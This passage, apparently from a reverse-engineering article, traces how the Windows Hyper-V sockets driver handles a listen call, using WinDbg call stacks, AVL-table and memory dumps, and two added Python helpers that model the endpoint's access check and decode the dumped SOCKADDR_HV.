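<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To make the access check concrete, the following added example (my own code, not from the article or from hvsocket) rebuilds the security descriptor dumped above as a self-relative byte blob, parses its DACL back, and runs a simplified SeAccessCheck-style DACL walk using the file generic mapping shown above. The desired access mask (0x3) and the non-SYSTEM caller SIDs are assumptions; the real kernel check also handles owner rights, privileges and MAXIMUM_ALLOWED, which this model omits.</span></div>

```python
import struct

# Public SDK constants (winnt.h / ntstatus.h).
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE, ACCESS_DENIED_ACE_TYPE = 0x0, 0x1
OBJECT_INHERIT_ACE, CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE = 0x01, 0x02, 0x08
GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000
GENERIC_EXECUTE, GENERIC_ALL = 0x20000000, 0x10000000
STATUS_SUCCESS, STATUS_ACCESS_DENIED = 0x00000000, 0xC0000022

# _GENERIC_MAPPING exactly as dumped from IoGetFileObjectGenericMapping in the trace above.
FILE_GENERIC_MAPPING = {"GenericRead": 0x120089, "GenericWrite": 0x120116,
                        "GenericExecute": 0x1200A0, "GenericAll": 0x1F01FF}


def sid_to_bytes(sid: str) -> bytes:
    """Encode textual 'S-1-5-18' into the binary SID layout: revision, count, 48-bit authority, sub-authorities."""
    parts = sid.split("-")
    assert parts[0] == "S"
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data: bytes, off: int) -> str:
    """Decode a binary SID at offset off back into 'S-R-A-...' text."""
    revision, count = struct.unpack_from("<BB", data, off)
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def access_allowed_ace(sid: str, mask: int, flags: int) -> bytes:
    """ACE header (type, flags, size) followed by the access mask and the trustee SID."""
    body = struct.pack("<I", mask) + sid_to_bytes(sid)
    return struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, flags, 4 + len(body)) + body


def build_hvsocket_endpoint_sd() -> bytes:
    """Constructed self-relative SD reproducing the !sd dump of VmbusTlEndpointSecurityDescriptor."""
    inherit = OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE               # AceFlags 0x3 in the dump
    aces = (access_allowed_ace("S-1-5-18", 0x000F003F, inherit)        # AceSize 0x14
            + access_allowed_ace("S-1-5-95-0", 0x000F003F, inherit))   # AceSize 0x18
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), 2, 0) + aces      # AclRevision 2, AclSize 0x34, AceCount 2
    # SECURITY_DESCRIPTOR_RELATIVE header: Revision 1, Control, Owner/Group/Sacl NULL, Dacl at offset 20.
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def parse_dacl(sd: bytes):
    """Walk the DACL of a self-relative SD; returns [(type, flags, size, mask, sid)] or None for a NULL DACL."""
    _, _, control, _, _, _, o_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or o_dacl == 0:
        return None
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, o_dacl)
    aces, off = [], o_dacl + 8
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", sd, off)
        mask, = struct.unpack_from("<I", sd, off + 4)
        aces.append((ace_type, ace_flags, ace_size, mask, sid_from_bytes(sd, off + 8)))
        off += ace_size
    return aces


def map_generic(desired: int, mapping=FILE_GENERIC_MAPPING) -> int:
    """RtlMapGenericMask: expand GENERIC_* bits into object-specific rights and clear the generic bits."""
    out = desired & 0x0FFFFFFF
    for bit, name in ((GENERIC_READ, "GenericRead"), (GENERIC_WRITE, "GenericWrite"),
                      (GENERIC_EXECUTE, "GenericExecute"), (GENERIC_ALL, "GenericAll")):
        if desired & bit:
            out |= mapping[name]
    return out


def access_check(sd: bytes, token_sids, desired: int) -> int:
    """Simplified SeAccessCheck DACL walk (no owner-rights, privilege or MAXIMUM_ALLOWED handling)."""
    remaining = map_generic(desired)
    aces = parse_dacl(sd)
    if aces is None:                       # NULL DACL grants everything
        return STATUS_SUCCESS
    for ace_type, ace_flags, _, mask, sid in aces:
        if ace_flags & INHERIT_ONLY_ACE or sid not in token_sids:
            continue                       # this ACE does not apply to the caller
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            remaining &= ~mask
        elif ace_type == ACCESS_DENIED_ACE_TYPE and remaining & mask:
            return STATUS_ACCESS_DENIED    # first matching deny wins
        if remaining == 0:
            return STATUS_SUCCESS
    return STATUS_SUCCESS if remaining == 0 else STATUS_ACCESS_DENIED


def endpoint_is_privileged_observed(status: int) -> int:
    """Mirror the observation in the trace: the low byte is zeroed on exit, so 0xC0000022 shows as 0xC0000000."""
    return status & 0xFFFFFF00


if __name__ == "__main__":
    sd = build_hvsocket_endpoint_sd()
    desired = 0x3   # assumed: FILE_READ_DATA | FILE_WRITE_DATA; the article does not state the real value
    for caller, sids in (("SYSTEM", {"S-1-5-18"}), ("S-1-5-95-0 holder", {"S-1-5-95-0"}),
                         ("Administrators only", {"S-1-5-32-544", "S-1-1-0"})):   # constructed token SID sets
        status = access_check(sd, sids, desired)
        print("%-20s -> 0x%08X (observed as 0x%08X)" % (caller, status, endpoint_is_privileged_observed(status)))
```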
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlFindOrCreateService</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlAssociateListenerToPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdStartListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Only now is hvsocket!VmbusTlCreateService called. It consists of two calls: hvsocket!VmbusTlCreateObject and hvsocket!VmbusTlInitializeObjectTable. The latter creates the AVL table with</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VOID RtlInitializeGenericTableAvl(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PRTL_AVL_TABLE Table,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,- hvsocket!VmbusTlCompareGuids</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,- hvsocket!VmbusTlAllocateForAvlTable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine, - hvsocket!VmbusTlFreeForAvlTable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PVOID TableContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the table has been initialized it looks like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_RTL_AVL_TABLE ffffb904c25c9f60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 BalancedRoot : _RTL_BALANCED_LINKS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x020 OrderedPointer : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x028 WhichOrderedElement : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x02c NumberGenericTableElements : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x030 DepthOfTree : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x038 RestartKey : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x040 DeleteCount : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x048 CompareRoutine : 0xfffff80a`6d6d16c0 _RTL_GENERIC_COMPARE_RESULTS hvsocket!VmbusTlCompareGuids+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x050 AllocateRoutine : 0xfffff80a`6d6d1db0 void* hvsocket!VmbusTlAllocateForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x058 FreeRoutine : 0xfffff80a`6d6d1dd0 void hvsocket!VmbusTlFreeForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x060 TableContext : 0x00000000`694c6353 Void</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlFindOrCreateService completes, then hvsocket!VmbusTlAssociateListenerToService is called, which in turn calls hvsocket!VmbusTlInsertObjectToTable. After that the table looks like this (one element has been added):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_RTL_AVL_TABLE ffffb904c25c9f60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 BalancedRoot : _RTL_BALANCED_LINKS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x020 OrderedPointer : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x028 WhichOrderedElement : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x02c NumberGenericTableElements : 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x030 DepthOfTree : 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x038 RestartKey : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x040 DeleteCount : 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlAssociateListenerToPartition finishes; then afd!AfdTLListenComplete, hvsocket!VmbusTlCommonProviderCloseEndpoint and hvsocket!VmbusTlQueueEndpointAction are called, the last of which calls netio!NetioInsertWorkQueue (handler procedure: hvsocket!VmbusTlEndpointActionWorkQueueRoutine). We return to afd!AfdTLListenComplete, where afd!AfdDerefTLBaseEndpoint is called, followed by nt!IofCompleteRequest.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We return to hvsocket!VmbusTlProviderListen, which next calls hvsocket!VmbusTlListenerProcessPendingIncomingConnection; that calls hvsocket!VmbusTlGetPendingConnection and then hvsocket!VmbusTlpGetPendingConnection, whose return value is 103h (STATUS_PENDING). Execution leaves afd.sys and we return to user mode.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, mswsock!SockSetHandleContext is called.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">User buffer contents for ntdll!NtDeviceIoControlFile:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd 00F6F668 00F6F668+d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f668 00000000 00000000 00000001 00000022</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f678 00000001 00000001 00000024 00000024</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f688 00000000 00000000 00000000 00010000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f698 00010000 00001001 00000000 000003e9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6a8 00020026 00000008 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6b8 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6c8 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6d8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1234191b 4ca74bf7 d7dfe086 45542bc3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6e8 00000004 7231873c 00000022 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f6f8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4f790d35 ea49e98c cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f708 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4570fe10 487662ad 1b7a9d77 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223088</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f718 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f728 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f738 00000000 00000144</span></div>
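<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The highlighted dwords are easier to read once they are turned back into bytes and GUIDs. The Python helper below is an added example, not code from the original article: it re-parses the dd output above verbatim, decodes GUIDs in the Windows little-endian layout, and interprets the bytes starting at 00f6f6f0 (the dword 00000022, i.e. Family = AF_HYPERV, followed by two GUIDs) as a SOCKADDR_HV. AF_HYPERV (0x22), the SOCKADDR_HV layout and the HV_GUID_CHILDREN value are from the public Hyper-V sockets definitions; treating the GUID at 00f6f6d8 as a separate 16-byte field, and the offsets themselves, are my reading of this dump.</span></div>

```python
"""Decode the WinDbg `dd` dump of the listen-time user buffer into GUIDs and a SOCKADDR_HV.

Added example: it re-parses the dd output from the article and applies the public
Hyper-V sockets definitions (AF_HYPERV, SOCKADDR_HV, HV_GUID_CHILDREN) to it.
"""
import struct
import uuid

# The `dd 00F6F668 00F6F668+d4` output from the article, pasted as-is.
DD_DUMP = """
00f6f668 00000000 00000000 00000001 00000022
00f6f678 00000001 00000001 00000024 00000024
00f6f688 00000000 00000000 00000000 00010000
00f6f698 00010000 00001001 00000000 000003e9
00f6f6a8 00020026 00000008 00000000 00000000
00f6f6b8 00000000 00000000 00000000 00000000
00f6f6c8 00000000 00000000 00000000 00000000
00f6f6d8 1234191b 4ca74bf7 d7dfe086 45542bc3
00f6f6e8 00000004 7231873c 00000022 90db8b89
00f6f6f8 4f790d35 ea49e98c cdb7c80a b1d00d3e
00f6f708 4570fe10 487662ad 1b7a9d77 01223088
00f6f718 00000000 00000000 00000000 00000000
00f6f728 00000000 00000000 00000000 00000000
00f6f738 00000000 00000144
"""

AF_HYPERV = 0x22  # address family of Hyper-V sockets (decimal 34)
# Well-known VmId meaning "any child partition of this host".
HV_GUID_CHILDREN = uuid.UUID("90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd")

# Offsets are an assumption taken from reading the dump, not stated by the article.
FIRST_GUID_ADDR = 0x00F6F6D8   # the first highlighted 16 bytes
SOCKADDR_HV_ADDR = 0x00F6F6F0  # dword 00000022 followed by two GUIDs


def dd_to_bytes(dump):
    """Turn `dd` output into (base address, raw bytes).

    dd prints 32-bit words as little-endian values, so each word is re-packed as
    four bytes to recover the original memory image.
    """
    base = None
    out = bytearray()
    for line in dump.strip().splitlines():
        fields = line.split()
        addr = int(fields[0], 16)
        if base is None:
            base = addr
        for word in fields[1:]:
            out += struct.pack("<I", int(word, 16))
    return base, bytes(out)


def guid_at(buf, off):
    """Read a Windows GUID (Data1..Data3 little-endian, Data4 as bytes) at `off`."""
    return uuid.UUID(bytes_le=buf[off:off + 16])


def parse_sockaddr_hv(buf, off):
    """Decode SOCKADDR_HV {USHORT Family; USHORT Reserved; GUID VmId; GUID ServiceId}."""
    family, reserved = struct.unpack_from("<HH", buf, off)
    if family != AF_HYPERV:
        raise ValueError(f"no AF_HYPERV address at +{off:#x}: family={family:#x}")
    return {
        "family": family,
        "reserved": reserved,
        "vm_id": guid_at(buf, off + 4),
        "service_id": guid_at(buf, off + 20),
    }


def decode_listen_buffer(dump=DD_DUMP):
    """Decode the whole buffer: the lone GUID, the SOCKADDR_HV and the trailing dword."""
    base, buf = dd_to_bytes(dump)
    return {
        "base": base,
        "first_guid": guid_at(buf, FIRST_GUID_ADDR - base),
        "sockaddr": parse_sockaddr_hv(buf, SOCKADDR_HV_ADDR - base),
        # The last dword of the dump; it equals the socket handle (144h).
        "trailing_dword": struct.unpack_from("<I", buf, len(buf) - 4)[0],
    }


if __name__ == "__main__":
    r = decode_listen_buffer()
    print(f"first GUID : {r['first_guid']}")
    print(f"VmId       : {r['sockaddr']['vm_id']}"
          f"{'  (HV_GUID_CHILDREN)' if r['sockaddr']['vm_id'] == HV_GUID_CHILDREN else ''}")
    print(f"ServiceId  : {r['sockaddr']['service_id']}")
    print(f"trailing   : {r['trailing_dword']:#x}")
```

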